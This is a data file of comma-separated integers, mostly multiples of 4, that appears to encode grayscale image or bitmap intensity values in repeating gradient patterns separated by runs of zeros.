8,0,0,0,0,0,0,0,0,0,0,0,4,28,40,52,64,76,88,104,112,100,100,100,100,112,100,84,72,64,52,40,28,4,4,4,4,0,0,0,0,0,0,0,0,0,0,0,0,28,40,52,64,76,88,108,120,104,104,104,104,120,108,88,76,64,52,40,28,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,48,60,72,84,100,124,136,116,112,112,112,128,112,88,76,64,52,40,28,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,52,68,84,100,120,148,160,140,132,128,124,132,112,84,72,60,48,36,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,56,76,96,116,140,172,184,164,152,144,136,136,112,80,68,56,44,32,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,28,52,72,92,112,136,164,172,152,136,124,112,108,84,56,48,40,32,24,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,44,60,76,92,112,136,140,120,104,92,80,76,56,32,28,24,20,16,12,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,36,48,60,72,88,108,108,88,72,60,48,44,28,8,8,8,8,8,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,32,44,56,68,84,100,100,84,68,56,44,36,20,4,4,4,4,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,32,44,56,68,84,96,96,84,64,52,40,32,16,4,4,4,4,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,32,48,64,80,96,108,112,104,88,76,64,56,40,28,24,20,16,12,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,32,48,64,80,96,108,116,112,100,92,84,80,64,52,44,36,28,20,12,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,32,48,64,80,96,108,120,120,112,108,104,104,88,76,64,52,40,28,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,28,40,52,64,76,88,100,100,96,96,96,104,92,80,68,56,44,32,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,28,40,52,64,76,88,100,100,96,96,96,104,92,80,68,56,44,32,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,28,40,52,64,76,88,100,100,96,96,96,104,92,80,68,56,44,32,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,28,40,52,68\n,80,92,104,104,100,100,100,108,96,84,72,60,48,36,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,24,36,48,68,84,96,108,108,108,108,112,116,100,88,76,64,52,40,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,16,24,32,52,68,80,88,88,88,92,100,104,88,76,68,60,52,40,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,8,12,16,36,52,64,72,72,76,84,92,96,80,68,60,56,48,36,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,36,48,56,60,68,76,84,84,68,56,48,44,36,28,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,36,52,64,72,84,92,100,96,80,64,52,44,32,24,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,44,64,80,92,108,120,132,128,108,88,72,60,44,32,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,28,52,76,92,104,124,140,156,152,128,104,88,76,56,40,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,28,56,80,96,108,128,148,168,164,136,112,96,84,64,44,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,28,52,76,92,104,124,144,164,160,136,112,96,84,64,44,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,44,64,80,92,112,128,144,144,124,104,88,76,56,40,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,36,56,72,88,108,124,140,140,124,104,88,72,52,36,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,32,52,68,84,104,124,144,148,132,112,96,80,60,40,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,40,56,72,84,100,124,148,152,132,116,100,88,72,48,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,36,48,64,72,84,104,128,132,116,104,88,80,68,48,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,36,44,64,72,80,96,120,124,108,100,80,72,64,48,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,36,48,72,80,88,100,124,128,112,100,76,68,60,48,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,40,56,84,92,100,116,140,140,120,104,76,68,60,44,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,44,64,96,104,116,136,160,156,132,112,80,72,60,40,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,44,60,88,92,100,116,140,136,112,96,68,64,56,40,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,4,4,4,24,44,56,80,76,80,92,112,112,92,80,56,56,52,40,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,12,16,20,24,44,64,80,100,96,100,108,124,124,104,88,64,60,52,40,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,20,28,36,44,64,88,108,124,120,124,132,144,144,120,100,76,68,56,40,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,28,40,52,64,84,108,132,144,140,144,152,160,160,136,112,88,76,60,40,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,28,40,52,64,80,100,120,128,124,128,136,140,144,124,104,84,72,56,36,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,28,40,52,64,76,92,108,112,108,112,116,116,128,112,96,80,68,52,36,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,28,40,52,64,80,96,108,108,104,104,104,108,120,104,92,80,68,56,44,28,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,36,48,60,72,92,112,128,128,124,128,132,140,152,132,116,100,84,68,52,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,40,52,64,76,100,124,144,144,144,152,160,172,180,156,136,116,96,76,56,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,32,40,48,56,76,96,112,112,112,120,128,140,152,132,116,100,84,68,52,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,24,28,32,36,52,68,80,80,80,88,96,108,124,108,96,84,72,60,48,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,16,16,16,16,32,48,56,56,56,64,72,88,104,88,80,72,64,56,48,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,16,16,16,16,36,56,64,64,64,72,84,104,116,96,88,80,72,64,52,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,16,16,16,16,40,60,68,68,68,80,96,120,128,108,100,92,84,72,56,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,16,16,16,16,40,56,64,68,72,88,108,128,136,120,112,100,88,72,52,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,8,8,8,8,32,44,52,60,68,84,100,116,124,112,104,92,80,64,48,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,36,44,56,64,76,88,100,108,96,88,76,68,56,44,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,28,44,56,68,76,88,100,112,116,100,88,76,68,56,44,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,52,64,76,84,96,112,128,128,108,96,84,76,64,48,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,28,44,56,68,80,92,108,120,120,104,92,80,68,56,40,28,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,36,52,68,84,100,112,120,120,108,92,76,60,44,32,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,36,56,76,96,112,120,124,124,108,88,68,48,32,24,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,40,60,76,96,112,116,120,116,96,76,60,40,24,20,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,8,28,48,64,76,96,112,112,112,104,84,68,56,36,20,16,12,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,12,20,36,52,64,72,96,112,108,104,96,80,68,60,36,16,12,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,12,24,36,52,68,80,92,116,132,128,124,116,100,88,76,48,24,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,20,36,52,68,84,100,116,140,156,148,140,132,116,100,84,52,24,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,20,36,52,68,84,100,116,140,160,152,144,136,120,104,88,56,24,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,20,36,52,68,84,96,108,132,152,144,136,128,112,100,88,56,24,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,20,36,52,72,84,92,100,120,136,128,120,108,96,88,80,52,24,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,20,36,56,76,84,92,100,116,128,120,108,96,88,80,72,48,24,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,20,36,56,76,88,100,112,128,140,136,128,120,108,96,84,60,36,24,12,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,20,36,56,80,96,112,128,144,156,156,152,144,128,112,96,72,48,32,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,12,24,40,64,76,88,100,116,128,128,128,120,108,96,84,64,44,32,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,12,24,48,56,64,72,88,100,100,104,96,88,80,72,56,40,32,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,12,24,48,56,64,72,84,92,92,96,88,80,72,64,52,40,32,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,12,24,48,56,64,72,80,84,84,88,80,72,64,56,48,40,32,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,16,28,48,56,64,72,80,80,80,84,84,76,68,60,52,44,36,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,20,28,44,52,60,68,76,72,72,80,88,80,72,64,56,48,40,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,20,28,36,52,60,68,76,80,72,72,80,88,80,72,64,56,48,40,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,24,32,40,56,64,72,80,80,72,72,80,88,80,72,64,56,48,40,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,24,32,40,52,60,68,76,76,68,68,76,88,80,72,64,56,48,40,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,24,32,40,48,56,64,72,72,64,64,68,84,76,68,60,52,44,36,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,24,32,40,48,56,64,72,72,64,64,68,84,76,68,60,52,44,36,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,24,32,40,48,56,64,72,72,64,64,68,84,76,68,60,52,44,36,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,20,28,36,48,60,72,84,88,84,84,88,96,84,72,60,48,40,32,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,16,28,40,56,72,88,104,112,116,116,116,116,100,84,68,52,40,28,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,12,24,36,52,68,84,100,112,116,116,116,112,96,80,64,48,36,24,12,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,12,24,32,44,56,68,80,88,88,88,92,92,80,68,56,44,36,24,12,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,20,32,40,52,64,76,88,92,88,88,88,88,76,64,52,40,32,20,12,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,24,36,44,56,68,80,92,92,88,88,92,92,80,68,56,44,36,24,12,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,32,48,56,68,80,92,104,100,92,92,100,104,92,80,68,56,48,32,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,36,56,68,84,100,116,132,132,124,124,132,132,116,100,84,68,56,36,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,36,60,76,92,108,124,140,140,136,136,140,140,124,108,92,76,60,36,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,36,56,68,84,100,116,132,132,124,124,132,132,116,100,84,68,56,36,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,32,48,56,72,84,96,108,104,96,96,104,108,96,84,72,60,52,36,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,24,36,44,64,80,96,112,116,116,120,128,128,112,96,80,64,52,36,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,16,28,36,60,80,100,120,132,140,148,160,156,136,116,96,76,60,40,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,12,24,32,60,84,108,132,152,164,176,188,180,156,132,108,84,64,40,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,12,20,52,80,104,128,152,168,180,188,176,148,124,100,76,56,36,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,8,40,68,88,108,128,144,156,164,156,128,108,88,68,52,36,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,60,80,96,112,124,136,152,148,120,100,84,68,56,44,28,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,60,80,96,112,128,144,164,164,136,116,100,84,68,52,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,28,60,84,104,124,144,164,188,192,160,136,116,96,76,56,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,52,72,88,104,120,136,156,164,136,116,100,88,72,56,36,4,4,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,44,60,72,84,96,108,124,132,108,92,80,76,64,52,36,8,8,8,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,36,48\n,56,64,72,80,92,100,80,68,60,64,56,48,36,12,12,12,12,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,28,40,48,56,64,72,84,92,76,64,56,64,56,48,36,16,16,16,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,20,32,40,48,56,64,76,84,72,60,52,64,56,48,36,20,20,20,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,12,20,28,36,44,52,60,68,60,52,44,60,52,44,36,24,24,24,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,8,12,16,20,24,28,36,32,28,24,48,44,40,36,28,28,28,28,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,4,4,4,36,36,36,36,32,32,32,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,32,32,32,32,32,32,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,32,32,32,32,32,32,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,32,32,32,32,32,32,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,4,4,4,4,36,36,36,36,32,32,32,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,12,16,20,24,28,32,36,36,32,28,24,48,44,40,36,28,28,28,28,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,20,28,36,44,52,60,68,68,60,52,44,60,52,44,36,24,24,24,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,28,40,52,64,76,88,100,100,88,76,64,72,60,48,36,20,20,20,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,36,48,60,72,84,96,108,108,92,80,68,72,60,48,36,16,16,16,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,44,56,68,80,92,104,116,116,96,84,72,72,60,48,36,12,12,12,12,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,28,52,68,80,92,104,116,132,132,108,92,80,76,64,52,36,8,8,8,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,60,80,96,112,128,144,164,164,136,116,100,88,72,56,36,4,4,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,28,60,84,104,124,144,164,188,192,160,136,116,96,76,56,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,52,72,88,104,120,136,156,164,136,116,100,84,68,52,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,52,72,88,104,116,128,144,148,120,100,84,68,56,44,28,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,8,32,60,80,96,112,124,132,140,140,112,92,76,60,48,36,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,12,20,44,72,96,116,136,148,156,164,160,132,108,88,68,52,36,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,12,24,32,52,76,100,120,136,144,152,164,164,140,116,96,76,60,40,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,20,32,40,56,76,96,116,128,132,140,148,152,132,112,92,72,56,36,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,24,36,44,56,72,88,104,108,108,112,120,128,112,96,80,64,52,36,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,32,48,56,68,80,92,104,100,92,92,100,108,96,84,72,60,52,36,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,36,56,68,84,100,116,132,132,124,124,132,132,116,100,84,68,56,36,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,36,60,76,92,108,124,140,140,136,136,140,140,124,108,92,76,60,36,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,36,56,68,84,100,116,132,132,124,124,132,132,116,100,84,68,56,36,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,32,52,60,72,84,96,108,104,96,92,100,104,92,80,68,56,48,32,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,32,52,60,72,84,96,108,104,96,88,92,92,80,68,56,44,36,24,12,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,32,52,60,72,84,96,108,104,96,88,92,88,76,64,52,40,32,20,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,36,56,64,76,88,100,112,108,96,88,88,84,72,60,48,36,28,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,36,52,60,72,84,96,108,104,96,92,92,88,76,64,52,40,28,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,40,52,56,64,72,84,96,88,80,80,84,84,76,64,52,40,28,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,48,56,60,68,76,88,100,88,72,72,76,76,68,56,44,32,24,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,28,56,68,76,84,92,100,108,88,68,64,64,64,56,48,40,32,24,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,64,76,88,96,104,112,120,96,72,68,64,64,56,48,40,32,24,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,60,68,80,88,96,104,112,88,68,68,64,64,56,48,40,36,28,20,12,4,4,4,4,0,0,0,0,0,0,0,0,0,0,0,0,28,52,60,72,80,88,96,104,84,68,68,64,64,56,48,40,40,32,24,16,8,8,8,8,0,0,0,0,0,0,0,0,0,0,0,0,24,44,52,64,72,80,88,96,80,68,68,64,60,52,44,36,40,32,24,16,12,12,12,12,0,0,0,0,0,0,0,0,0,0,0,0,20,36,44,56,64,72,80,88,76,64,60,52,44,36,28,20,28,24,20,16,16,16,16,16,0,0,0,0,0,0,0,0,0,0,0,0,16,28,36,48,56,64,68,72,60,48,40,28,20,12,8,4,20,20,20,20,20,20,20,20,0,0,0,0,0,0,0,0,0,0,0,0,12,20,28,36,40,44,44,44,32,24,16,8,4,0,0,0,24,24,24,24,24,24,24,24,0,0,0,0,0,0,0,0,0,0,0,0,8,12,16,20,20,20,20,20,12,8,4,0,0,0,0,0,28,28,28,28,28,28,28,28,0,0,0,0,0,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,0,0,0,0,0,0,0,0,32,32,32,32,32,32,32,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,32,32,32,32,32,32,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,32,32,32,32,32,32,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,32,32,32,32,32,32,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,32,32,32,32,32,32,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,8,8,8,8,8,8,8,8,8,8,8,8,36,36,36,32,28,28,28,28,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,12,20,20,20,20,20,20,16,16,16,16,16,16,40,40,40,32,24,24,24,24,0,0,0,0,0,0,0,0,0,0,0,0,4,8,16,28,40,40,40,40,36,32,24,24,24,24,24,24,44,44,44,32,20,20,20,20,0,0,0,0,0,0,0,0,0,0,0,0,8,16,24,40,56,60,60,60,52,44,36,32,32,28,28,28,44,44,44,32,16,16,16,16,0,0,0,0,0,0,0,0,0,0,0,0,12,24,32,52,72,80,80,80,68,56,48,44,44,36,36,36,48,48,48,32,12,12,12,12,0,0,0,0,0,0,0,0,0,0,0,0,16,32,40,60,84,96,100,104,88,72,68,68,64,52,48,44,52,52,48,28,8,8,8,8,0,0,0,0,0,0,0,0,0,0,0,0,20,40,48,68,92,108,116,124,108,92,92,96,92,76,68,60,60,56,48,24,4,4,4,4,0,0,0,0,0,0,0,0,0,0,0,0,24,44,52,72,96,112,124,136,120,108,108,112,108,92,80,68,60,52,44,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,44,52,68,88,104,116,128,112,100,100,104,100,84,72,60,52,44,36,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,44,48,60,76,92,104,120,108,100,104,108,104,88,76,60,48,36,28,12,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,36,36,44,56,72,88,108,104,104,112,116,112,96,80,60,44,28,20,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,28,28,32,44,60,80,100,104,112,120,128,120,104,84,64,44,24,16,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,20,20,24,36,52,72,92,104,120,128,132,120,104,84,64,40,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,12,16,24,36,48,64,80,100,124,124,120,108,96,80,64,36,8,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,8,16,28,40,48,60,72,96,120,112,100,88,80,68,56,28,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,12,24,40,56,68,80,92,116,136,128,116,104,92,80,68,40,12,8,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,20,36,56,76,92,108,124,148,168,160,148,136,120,104,88,56,24,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,20,36,56,76,92,108,120,144,164,156,144,132,116,100,88,56,24,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,20,36,56,76,92,104,112,136,152,144,132,120,104,92,84,52,24,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,20,36,56,76,88,96,104,124,136,128,116,104,92,84,76,48,24,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,20,36,52,72,84,96,104,120,128,120,112,100,88,76,68,44,24,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,20,32,44,64,80,96,108,124,128,124,120,108,92,76,64,40,24,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,16,24,32,56,76,96,112,128,136,140,140,124,104,84,68,44,28,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,8,12,16,40,56,72,88,108,120,128,132,116,100,84,68,44,28,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,32,44,56,76,92,104,112,100,88,76,64,44,28,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,36,48,60,80,96,112,124,108,96,84,72,52,36,20,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,28,44,60,76,96,112,128,140,120,104,88,72,52,36,20,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,28,48,68,84,104,120,136,148,128,108,88,72,52,36,20,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,28,44,60,76,96,112,128,140,120,104,88,72,52,36,20,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,36,48,60,76,92,108,124,108,96,84,72,56,40,24,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,8,8,28,36,44,52,64,72,80,100,92,84,76,68,56,44,32,12,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,12,16,16,32,40,48,52,56,56,60,80,76,68,60,56,48,40,32,12,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,20,24,24,40,48,60,64,64,56,56,76,72,64,52,48,40,36,32,12,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,28,32,32,44,56,72,76,68,52,48,64,68,56,40,36,32,32,32,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,36,44,44,56,68,84,88,72,52,44,64,72,60,44,40,40,40,40,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,44,56,60,72,84,100,108,92,72,64,84,96,84,68,60,56,52,48,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,48,64,72,84,96,116,128,116,96,88,108,120,108,88,76,68,60,52,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,48,64,72,84,96,116,132,124,108,100,116,128,116,96,80,68,56,48,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,44,56,64,76,88,108,124,116,104,100,1\n12,120,108,88,72,60,48,40,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,36,48,56,68,80,100,116,112,104,100,108,112,100,80,64,52,40,32,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,28,40,48,60,72,88,104,104,100,96,100,100,88,72,56,44,32,24,12,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,12,24,36,44,56,64,76,88,92,92,88,92,88,80,68,52,44,32,24,12,4,4,4,4,0,0,0,0,0,0,0,0,0,0,0,8,16,28,40,52,64,72,80,84,88,88,88,88,84,80,76,68,64,52,40,28,20,16,12,8,0,0,0,0,0,0,0,0,0,0,0,8,16,28,40,52,64,72,80,80,80,80,80,80,76,76,76,76,76,64,52,40,32,24,16,8,0,0,0,0,0,0,0,0,0,0,0,8,16,28,40,52,64,72,80,80,80,80,76,76,76,80,84,84,84,72,64,52,40,28,16,8,0,0,0,0,0,0,0,0,0,0,0,8,16,28,40,52,64,72,80,80,80,76,72,72,72,76,80,80,80,72,64,52,40,28,16,8,0,0,0,0,0,0,0,0,0,0,0,8,16,28,40,52,64,72,80,80,80,76,72,72,72,76,80,80,80,72,64,52,40,28,16,8,0,0,0,0,0,0,0,0,0,0,0,8,16,28,40,52,64,72,80,80,80,76,72,72,72,76,80,80,80,72,64,52,40,28,16,8,0,0,0,0,0,0,0,0,0,0,0,8,16,28,40,52,64,72,80,80,80,76,72,72,72,76,80,80,80,72,64,52,40,28,16,8,0,0,0,0,0,0,0,0,0,0,0,4,12,24,36,48,60,68,76,80,80,76,72,72,72,76,80,80,76,68,60,48,36,24,12,4,0,0,0,0,0,0,0,0,0,0,0,0,4,12,20,28,36,40,48,56,60,60,56,56,56,60,60,56,48,40,36,28,20,12,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,8,12,16,16,20,28,36,36,32,32,32,36,36,28,20,16,16,12,8,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,8,8,8,8,8,8,8,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0